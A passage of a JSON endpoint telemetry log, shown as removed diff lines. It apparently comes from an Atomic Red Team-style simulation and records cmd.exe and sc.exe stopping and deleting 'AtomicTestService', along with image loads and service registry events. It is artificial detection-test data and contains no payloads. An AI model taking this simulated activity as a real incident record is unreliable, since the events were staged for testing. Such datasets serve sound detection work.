}, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3448, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845110000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3448, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845110000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3448, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845110000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3448, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845110000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3448, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845110000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 3448, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845110000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" - }, - { - "event_type": "process", - "pid": 3448, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "subtype": "terminate", - "timestamp": 131883570845270000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001003C74C01}" - }, - { - "event_type": "process", - "pid": 5588, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570845270000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"sc.exe stop AtomicTestService\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 428, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570845380000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845270000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845270000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845270000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845270000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845270000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" - }, - { - "command_line": "sc.exe stop AtomicTestService", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6352, - "ppid": 428, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "subtype": "create", - "timestamp": 131883570845480000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}", - "unique_ppid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "sc.exe", - "image_path": "C:\\Windows\\System32\\sc.exe", - "pid": 6352, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845430000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6352, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845430000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6352, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845430000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6352, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845430000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6352, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845430000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6352, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845430000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6352, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845430000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" - }, - { - "event_type": "process", - "pid": 6352, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "subtype": "terminate", - "timestamp": 131883570845430000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001063C94C01}" - }, - { - "event_type": "process", - "pid": 428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570845580000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00105CC84C01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"sc.exe delete AtomicTestService\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7720, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570845660000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7720, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845580000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7720, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845580000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7720, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845580000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7720, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845580000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7720, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845580000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" - }, - { - "command_line": "sc.exe delete AtomicTestService", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2472, - "ppid": 7720, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "subtype": "create", - "timestamp": 131883570845760000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}", - "unique_ppid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "sc.exe", - "image_path": "C:\\Windows\\System32\\sc.exe", - "pid": 2472, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2472, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2472, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2472, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2472, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2472, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 2472, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\DeleteFlag", - "registry_value": "DeleteFlag", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start", - "registry_value": "Start", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_value": "AtomicTestService", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "process", - "pid": 2472, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "subtype": "terminate", - "timestamp": 131883570845740000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010A3CB4C01}" - }, - { - "event_type": "process", - "pid": 7720, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570845890000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-00109CCA4C01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3136, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570845950000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3136, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845890000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3136, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845890000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3136, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845890000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3136, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845890000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3136, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570845890000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" - }, - { - "event_type": "process", - "pid": 3136, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570845890000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010EFCC4C01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_value": "AtomicTestService", - "timestamp": 131883570846520000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Type", - "registry_value": "Type", - "timestamp": 131883570846520000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start", - "registry_value": "Start", - "timestamp": 131883570846520000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ErrorControl", - "registry_value": "ErrorControl", - "timestamp": 131883570846520000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ImagePath", - "registry_value": "ImagePath", - "timestamp": 131883570846520000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ObjectName", - "registry_value": "ObjectName", - "timestamp": 131883570846520000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570847300000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570847300000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847460000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", 